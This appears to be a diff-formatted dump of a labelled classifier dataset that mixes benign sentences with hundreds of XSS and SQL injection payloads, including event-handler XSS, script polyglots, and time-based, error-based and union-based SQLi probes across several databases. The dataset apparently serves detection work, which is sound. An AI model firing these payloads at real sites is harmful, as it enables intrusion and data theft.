-<svg id=x tabindex=1 onactivate=alert(1)></svg>,1,XSS,2055 -Where's your SQL expertise?,0,normal,23552 -"<details onmouseup=""alert(1)"">test</details>",1,XSS,2590 -"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( 9646 = 9646",2,SQLi,16345 -"<strike onmouseleave=""alert(1)"">test</strike>",1,XSS,5655 -"<div draggable=""true"" contenteditable>drag me</div><article ondragover=alert(1) contenteditable>drop here</article>",1,XSS,4385 -"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ""psbz"" = ""psbz",2,SQLi,19516 -"{""id"":null,""name"":""subject""}",0,normal,25643 -"1 ) where 1513 = 1513 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13515 -"<div id=""138""><link rel=""import"" href=""test.svg"" />//[""'`-->]]>]</div><div id=""139""><iframe srcdoc=""&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;"" />//[""'`-->]]>]</div>undefined",1,XSS,9113 -"<xmp onkeydown=""alert(1)"" contenteditable>test</xmp>",1,XSS,6194 -"-2323"" ) as zgsn where 9274 = 9274 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --",2,SQLi,12494 --6912' in boolean mode ) union all select 6012--,2,SQLi,21385 -Select depart.,0,normal,24820 -"<details onkeydown=""alert(1)"" contenteditable>test</details>",1,XSS,1892 -1 ) ) ) and 7533 = 7533 and ( ( ( 7740 = 7740,2,SQLi,18422 -"1%"" ) union all select null--",2,SQLi,14435 -"<div style=""font-family:'foo&#10;;color:red;';"">XXX",1,XSS,656 +"ABC<div style=""x:\x0Aexpression(javascript:alert(1)"">DEF",1,XSS,446 +"1 ) union all select null,null,null,null--",2,SQLi,15801 +"1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'cxor' = 'cxor",2,SQLi,21131 +"<dir onmouseenter=""alert(1)"">test</dir>",1,XSS,7248 +"1 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,12837 +"<IMG SRC=x onseeking=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1188 +"<embed src=""http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf""> ?",1,XSS,9113 +"1' and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and 'tqvy' like 'tqvy",2,SQLi,15555 +"1%' or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and '%' = '",2,SQLi,18467 +Merge data.,0,normal,22989 +<pre id=x tabindex=1 onfocusin=alert(1)></pre>,1,XSS,4823 +"AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337",2,SQLi,11192 +"<div id=""136""><form action="""" method=""post"">",1,XSS,9071 +"1"" ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ""uquh"" = ""uquh",2,SQLi,19928 +"1"" ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ""ejpw"" = ""ejpw",2,SQLi,20493 +Set.constructor`alert\x28document.domain\x29```,1,XSS,2004 +"-9659 ) ) ) union all select 8665,8665,8665,8665,8665,8665,8665--",2,SQLi,15096 +"<optgroup draggable=""true"" ondragenter=""alert(1)"">test</optgroup>",1,XSS,8529 +&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS,1,XSS,1330 +"1,iif ( 6625 = 6625,1,1/0 )",2,SQLi,15519 +Randomly select a book.,0,normal,24314 +Select the perfect camera settings.,0,normal,24038 +<audio id=x tabindex=1 ondeactivate=alert(1)></audio><input id=y autofocus>,1,XSS,3382 +1' and 4374 = 2305,2,SQLi,13061 +<del onpointerenter=alert(1)>XSS</del>,1,XSS,2959 +"<style>@keyframes slidein {}</style><content style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></content>",1,XSS,2287 +"<big draggable=""true"" ondragend=""alert(1)"">test</big>",1,XSS,4190 +The Financial Select Sector SPDR Fund rallied 18 percent since Nov.,0,normal,25409 +"-3518 ) union all select 1877,1877,1877,1877#",2,SQLi,19037 +"<noframes onmouseenter=""alert(1)"">test</noframes>",1,XSS,4392 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29",2,SQLi,10510 +"1%"" ) ) rlike ( select ( case when ( 4207 = 1757 ) then 1 else 0x28 end ) ) and ( ( ""%"" = """,2,SQLi,19990 +"<embed draggable=""true"" ondragstart=""alert(1)"">test</embed>",1,XSS,8366 +"1' ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,18137 +"-4849"" ) ) or ( 5005 = 9111 ) *9111 and ( ( ""catv"" like ""catv",2,SQLi,20253 +"<html oncut=""alert(1)"" contenteditable>test</html>",1,XSS,4601 +Select your investigate.,0,normal,24955 +<table onpointerout=alert(1)>XSS</table>,1,XSS,4035 +Select the best route for your commute.,0,normal,23985 +"1 ) as ahfj where 4776 = 4776 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,21429 +"-7388"" ) as rlth where 5746 = 5746 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,19035 +"-3445 union all select 5505,5505,5505--",2,SQLi,14889 +He ordered a meal from his favorite restaurant.,0,normal,23856 +"-2007%' ) ) union all select 7298,7298,7298#",2,SQLi,17383 +"<article draggable=""true"" ondrag=""alert(1)"">test</article>",1,XSS,1693 +"1 ) ) as xebl where 3105 = 3105 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14929 +Fetch information where needed.,0,normal,23212 +"<video autoplay controls onseeked=alert(1)><source src=""validvideo.mp4"" type=""video/mp4""></video>",1,XSS,7913 +"1"" where 4688 = 4688 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,18752 +"1 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,14578 +<a onpointermove=alert(1)>XSS</a>,1,XSS,7487 +1 ) as iqkf where 7780 = 7780,2,SQLi,17032 +document.write(213),1,XSS,5524 +"<style>@keyframes x{}</style><img style=""animation-name:x"" onanimationend=""alert(1)""></img>",1,XSS,6577 +"1 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) -- bqxe",2,SQLi,17342 +"1%"" ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ""%"" = """,2,SQLi,15069 "<OBJECT TYPE=""text/x-scriptlet"" DATA=""%(scriptlet)s""></OBJECT>",1,XSS,726 -"<center onpaste=""alert(1)"" contenteditable>test</center>",1,XSS,8023 -<body onafterprint=alert(1)>,1,XSS,48 -"<video onbeforecopy=""alert(1)"" contenteditable>test</video>",1,XSS,6689 -"1 ) ) union all select null,null,null,null--",2,SQLi,14533 -"select * from users where id = 1 or \<1 union select 1,@@VERSION -- 1",2,SQLi,11584 -"ABC<div style=""x:\xE2\x80\x87expression(javascript:alert(1)"">DEF",1,XSS,455 -"javascript:/*""/*`/*'/*\""/*--></title></script></textarea></noscript></style></noembed></template><script> /*<svg <frame onload=/**/alert()//</script>",1,XSS,9531 -‘ or 3 = 3 --,2,SQLi,11759 -"<main onmousedown=""alert(1)"">test</main>",1,XSS,1808 -"1' and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )",2,SQLi,13957 -<sup onpointerleave=alert(1)>XSS</sup>,1,XSS,3404 -1%' ) ) ) and 4595 = 4595#,2,SQLi,15726 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""pawh"" = ""pawh",2,SQLi,12219 -Select your demand.,0,normal,25146 -1' rlike ( select ( case when ( 5567 = 5586 ) then 1 else 0x28 end ) ) and 'mmnb' = 'mmnb,2,SQLi,20609 -"<i oncut=""alert(1)"" contenteditable>test</i>",1,XSS,2537 -%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E,1,XSS,9427 -"<rtc onmouseover=""alert(1)"">test</rtc>",1,XSS,5437 -Where's the self-help seminar?,0,normal,23840 -<tt onpointerup=alert(1)>XSS</tt>,1,XSS,7783 -"1' ) ) as jxvv where 6593 = 6593 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,14872 -1'+ ( select nash where 4159 = 4159 union all select null#,2,SQLi,20907 -1 ) ) as uvep where 6016 = 6016 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,15939 -"<address onmouseenter=""alert(1)"">test</address>",1,XSS,3449 -"<div draggable=""true"" contenteditable>drag me</div><canvas ondrop=alert(1) contenteditable>drop here</canvas>",1,XSS,7977 -"-1015"" ) ) union all select 6624,6624#",2,SQLi,17514 -<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup>,1,XSS,4983 -"1'|| ( select 'yhkt' from dual where 7105 = 7105 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) ) ||'",2,SQLi,18782 -"<col draggable=""true"" ondragenter=""alert(1)"">test</col>",1,XSS,1688 -1'|| ( select 'jmhb' where 1794 = 1794 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,15812 -"<style>@keyframes slidein {}</style><hgroup style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></hgroup>",1,XSS,8855 -"1' ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( 'tzbp' = 'tzbp",2,SQLi,17903 -"1"" ) where 6255 = 6255 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,21254 -"javascript:alert()//""/*`/*'/*\""/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()><<script>alert()<</script>",1,XSS,9543 -1 ) where 4711 = 4711,2,SQLi,22368 -<br onpointerdown=alert(1)>XSS</br>,1,XSS,6600 -Select the best course for your career.,0,normal,24387 -"1%' ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( '%' = '",2,SQLi,21346 -"<canvas onmouseenter=""alert(1)"">test</canvas>",1,XSS,7260 -"iif ( 1483 = 7301,1,1/0 )",2,SQLi,21971 -"<style>:target {transform: rotate(180deg);}</style><code id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></code>",1,XSS,2010 -Sort the tangled wires on your desk.,0,normal,23162 -Where's the botanical garden?,0,normal,23773 -<span id=x tabindex=1 onfocusin=alert(1)></span>,1,XSS,3804 -"<article draggable=""true"" ondragleave=""alert(1)"">test</article>",1,XSS,4786 -"-5700 where 4238 = 4238 union all select 4238,4238,4238#",2,SQLi,12846 -"<script> -Object.prototype.sourceURL = '\u2028\u2029alert(1)' -</script> -<script> -_.template('test') -</script>",1,XSS,211 -"<source onmouseleave=""alert(1)"">test</source>",1,XSS,6915 -"<img \x39src=x onerror=""javascript:alert(1)"">",1,XSS,618 -"<style>@keyframes x{}</style><audio style=""animation-name:x"" onanimationstart=""alert(1)""></audio>",1,XSS,4337 -1' ) as epgz where 2898 = 2898 and 7028 = 2287#,2,SQLi,19533 -"1' ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13117 -"select * from users where id = '1' + 1||1 union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,11794 -"<sub draggable=""true"" ondrag=""alert(1)"">test</sub>",1,XSS,5744 -""",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10946 -""";waitfor delay '0:0:__TIME__'--",2,SQLi,10885 -1'+ ( select wpai where 3685 = 3685,2,SQLi,13688 -"<script draggable=""true"" ondragenter=""alert(1)"">test</script>",1,XSS,6791 -1 ) as rlft where 1670 = 1670 waitfor delay '0:0:5'--,2,SQLi,15009 -"1%"" ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ""%"" = """,2,SQLi,13415 -"1"" where 5517 = 5517 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,22286 -"-7700%' ) union all select 5660,5660,5660,5660,5660,5660,5660,5660,5660#",2,SQLi,15800 -"1' where 5786 = 5786 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,21427 -1' where 7176 = 7176,2,SQLi,19676 -"<time draggable=""true"" ondragleave=""alert(1)"">test</time>",1,XSS,3287 -1'+ ( select 'vddk' where 6961 = 6961,2,SQLi,19921 -Select gift.,0,normal,23226 -"1%"" or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ""%"" = """,2,SQLi,19306 -<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>,1,XSS,899 --3821' ) or 9323 = 9323#,2,SQLi,18562 -"1"" ) as dfmm where 7563 = 7563 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,19260 -"<label draggable=""true"" ondragleave=""alert(1)"">test</label>",1,XSS,8890 -"<a href=""javas\x04cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,416 -"1' ) as ohnu where 4097 = 4097 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,20360 -<wbr id=x tabindex=1 onfocusin=alert(1)></wbr>,1,XSS,7469 -"<samp onmouseenter=""alert(1)"">test</samp>",1,XSS,5184 -<br onpointerup=alert(1)>XSS</br>,1,XSS,4875 -"1'+ ( select tnch where 1867 = 1867 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) +'",2,SQLi,21749 -<mark onpointerdown=alert(1)>XSS</mark>,1,XSS,4416 -"{""id"":null,""firstName"":""Tao"",""lastName"":""Ming"",""address"":""105 Amity Way, Wayne PA 19087"",""city"":""642"",""telephone"":""3320145468""}",0,normal,25392 -"1 ) ) ) union all select null,null,null,null,null,null--",2,SQLi,12708 -Select market.,0,normal,24732 --9024 ) where 1686 = 1686 or 3069 = 8213--,2,SQLi,16127 -"<menuitem onmouseenter=""alert(1)"">test</menuitem>",1,XSS,6625 -"<del onmouseover=""alert(1)"">test</del>",1,XSS,6180 -; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --,2,SQLi,11205 -"select * from users where id = '1' union select @ 1,version ( ) -- 1'",2,SQLi,11839 -Merge the musical notes.,0,normal,22763 -"-7518"" or elt ( 8413 = 3995,3995 ) and ""cpnf"" = ""cpnf",2,SQLi,16007 -"1 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) # jmki",2,SQLi,16331 -"or sleep(5)# -' or sleep(5)# -or sleep(5)=""",2,SQLi,10387 -"{""id"":null,""name"":""gradually""}",0,normal,25350 -<;SCRIPT SRC=http://ha.ckers.org/xss.js,1,XSS,1599 -"1 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,19715 -1' ) ) as zbkp where 1720 = 1720 and 4110 = 6748#,2,SQLi,21163 -"-6359"" ) ) or elt ( 3546 = 2433,2433 ) and ( ( ""qxat"" = ""qxat",2,SQLi,13784 -"1"" ) where 8571 = 8571 and elt ( 4249 = 4249,7259 ) --",2,SQLi,20194 -"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual",2,SQLi,19488 -"select count ( * ) from generate_series ( 1,5000000 ) #",2,SQLi,12516 -"<style></style\x0D<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,426 -"<spacer oncopy=""alert(1)"" contenteditable>test</spacer>",1,XSS,6905 -1' ) ) rlike sleep ( 5 ) and ( ( 'tufg' = 'tufg,2,SQLi,21591 -<summary onpointerup=alert(1)>XSS</summary>,1,XSS,6068 -"1' ) where 9381 = 9381 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,19418 -"1 ) ) as myyh where 5116 = 5116 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,18667 -"<bdi draggable=""true"" ondrag=""alert(1)"">test</bdi>",1,XSS,6166 -"&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;",1,XSS,1372 -"`'><script>\x20javascript:alert(1)</script> -`'><script>\x20javascript:alert(536)</script>",1,XSS,8936 -"<rp oncontextmenu=""alert(1)"">test</rp>",1,XSS,4771 -if ( 2695 = 9045 ) select 2695 else drop function qmno--,2,SQLi,16621 -"1' ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( 'khah' like 'khah",2,SQLi,20292 -"1 ) where 2020 = 2020 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17501 -"\"";alert('');//",1,XSS,5392 -<u id=x tabindex=1 onbeforeactivate=alert(1)></u>,1,XSS,4225 -"<element onmouseout=""alert(1)"">test</element>",1,XSS,7307 -"{""id"":null,""firstName"":""Ng"",""lastName"":""Hui"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25777 -"window['a'+'l'+'e'+'r'+'t'].call(this,1)",1,XSS,9414 -1' ) and 7290 = 8416 and ( 'ktlz' like 'ktlz,2,SQLi,14423 -1'+ ( select 'yjpp' where 8966 = 8966,2,SQLi,13779 -Select your challenge.,0,normal,25101 -"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 5 ) ) AND 'i' = 'i",2,SQLi,11459 -"<input onkeypress=""alert(1)"" contenteditable>test</input>",1,XSS,6497 --3880 ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 5194 = 5194,2,SQLi,22206 -"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*",2,SQLi,11009 -"1' in boolean mode ) and make_set ( 8403 = 8403,8899 ) #",2,SQLi,20558 -"1"" rlike sleep ( 5 ) #",2,SQLi,15125 -select * from users where id = 1 <@.$ or 1 = 1 -- 1,2,SQLi,11509 -"1"" ) ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13611 -"-5009 ) where 8463 = 8463 union all select 8463,8463,8463,8463,8463,8463--",2,SQLi,15668 -"<address oncontextmenu=""alert(1)"">test</address>",1,XSS,3126 -"<aside oncut=""alert(1)"" contenteditable>test</aside>",1,XSS,7878 -"1' in boolean mode ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) #",2,SQLi,16329 -"<title onmouseleave=""alert(1)"">test</title>",1,XSS,3616 -"<shadow oncopy=""alert(1)"" contenteditable>test</shadow>",1,XSS,2405 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) )",2,SQLi,12926 -"<iframe onbeforecopy=""alert(1)"" contenteditable>test</iframe>",1,XSS,2813 -1'|| ( select 'miew' where 8360 = 8360 waitfor delay '0:0:5' ) ||',2,SQLi,13623 -"<hgroup onmouseover=""alert(1)"">test</hgroup>",1,XSS,7168 -"-1676'|| ( select 'xzmu' from dual where 6373 = 6373 union all select 6373,6373--",2,SQLi,15030 -"1' ) where 6214 = 6214 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,18148 -"<dt onclick=""alert(1)"">test</dt>",1,XSS,5771 -"{""id"":null,""name"":""Ditto""}",0,normal,25494 -Select obtain.,0,normal,24742 -<tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus>,1,XSS,3577 -1 where 8214 = 8214 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,15803 -ORDER BY 4#,2,SQLi,10312 -"<noframes oncopy=""alert(1)"" contenteditable>test</noframes>",1,XSS,8424 -"1' ) where 6731 = 6731 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16044 -"<isindex onmousedown=""alert(1)"">test</isindex>",1,XSS,2726 -<tr id=x tabindex=1 ondeactivate=alert(1)></tr><input id=y autofocus>,1,XSS,2259 -Select your outcome.,0,normal,25060 -"1'+ ( select 'fpnz' where 1592 = 1592 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) +'",2,SQLi,17642 -">-->*/</noscript></ti tle><script>alert()</script> -'--></style></script><svg oNload=alert()>",1,XSS,9516 -<kbd onpointerover=alert(1)>XSS</kbd>,1,XSS,8623 -Select the ideal spot.,0,normal,24473 -"<strong draggable=""true"" ondrag=""alert(1)"">test</strong>",1,XSS,4837 -"1 ) ) as gdcg where 2329 = 2329 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,22535 -<style id=x tabindex=1 onbeforedeactivate=alert(1)></style><input autofocus>,1,XSS,4033 -"1"" ) ) as dcrk where 5164 = 5164 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,16725 -Create a plan.,0,normal,23032 -"1"" ) ) as mvxa where 3024 = 3024",2,SQLi,12533 -"{""id"":null,""name"":""Dugong""}",0,normal,25768 -</script><svg onload=alert(1)>,1,XSS,9011 -"</script><img/*%00/src=""worksinchrome&colon;prompt(1)""/%00*/onerror='eval(src)'>",1,XSS,314 -<track onpointerenter=alert(1)>XSS</track>,1,XSS,2190 -"<style>:target {transform: rotate(180deg);}</style><object id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></object>",1,XSS,8230 -ORDER BY 6--,2,SQLi,10283 -<picture onblur=alert(1) tabindex=1 id=x></picture><input autofocus>,1,XSS,3227 -"1' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( 'llfp' = 'llfp",2,SQLi,15413 -"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'lqql' = 'lqql",2,SQLi,14704 -<li id=x tabindex=1 onbeforedeactivate=alert(1)></li><input autofocus>,1,XSS,6727 -<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />,1,XSS,31 -%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E,1,XSS,8966 -"-5247"" union all select 3097,3097,3097,3097,3097,3097,3097#",2,SQLi,13408 -"1' where 6721 = 6721 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,17548 -<svg/onload=alert(/INJECTX/)>,1,XSS,9887 -"<i onbeforecopy=""alert(1)"" contenteditable>test</i>",1,XSS,4449 -"<svg onmouseout=""alert(1)"">test</svg>",1,XSS,4326 -ORDER BY 24#,2,SQLi,10332 -"<td onkeyup=""alert(1)"" contenteditable>test</td>",1,XSS,6959 -"{""id"":null,""firstName"":""Ayodhyala"",""lastName"":""Bhaskara Sri Vatsav"",""address"":""Bedok Shopping Complex 342 Bedok Road"",""city"":""866"",""telephone"":""1930443381""}",0,normal,25892 -"<style>:target {color:red;}</style><col id=x style=""transition:color 1s"" ontransitionend=alert(1)></col>",1,XSS,8727 -"<META HTTP-EQUIV=""Link"" Content=""<http://.rocks/.css>; REL=stylesheet"">",1,XSS,8846 -select ( case when ( 5085 = 4259 ) then 5085 else 5085* ( select 5085 from mysql.db ) end ) #,2,SQLi,20988 -<strike id=x tabindex=1 onbeforedeactivate=alert(1)></strike><input autofocus>,1,XSS,5220 -UNION ALL SELECT 1#,2,SQLi,10566 -"1' ) ) as lmsl where 3753 = 3753 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13715 -"<dd oncut=""alert(1)"" contenteditable>test</dd>",1,XSS,8021 -"<A HREF=""http://ha.ckers.org@google""></A>",1,XSS,1721 -"&lt;A HREF=\""//www&#46;google&#46;com/\""&gt;XSS&lt;/A&gt;",1,XSS,1010 -"<style>:target {color:red;}</style><bdi id=x style=""transition:color 1s"" ontransitionend=alert(1)></bdi>",1,XSS,2916 -"1"" ) ) ) and 7533 = 7533 and ( ( ( ""alvd"" like ""alvd",2,SQLi,19687 -"-2901"" or elt ( 9866 = 9099,9099 ) and ""asib"" like ""asib",2,SQLi,21309 -1 ) ) as jvoo where 5116 = 5116 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,20968 -"<style>:target {color:red;}</style><main id=x style=""transition:color 1s"" ontransitionend=alert(1)></main>",1,XSS,8352 -"1"" where 4991 = 4991 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,19220 -Select the perfect honeymoon destination.,0,normal,24576 -"1'|| ( select 'ryyc' from dual where 5196 = 5196 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) ||'",2,SQLi,15837 -Select your preferred date.,0,normal,24645 -<style id=x tabindex=1 onfocus=alert(1)></style>,1,XSS,7316 -"1 ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,19905 -<script id=x tabindex=1 onbeforeactivate=alert(1)></script>,1,XSS,3530 -"{""id"":null,""firstName"":""Jacob"",""lastName"":""Ong"",""address"":""337 BRIGHTSEAT ROAD, LANDOVER MD 20785"",""city"":""779"",""telephone"":""4413092766""}",0,normal,25384 -"1"" ) ) as qrrx where 4633 = 4633 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) 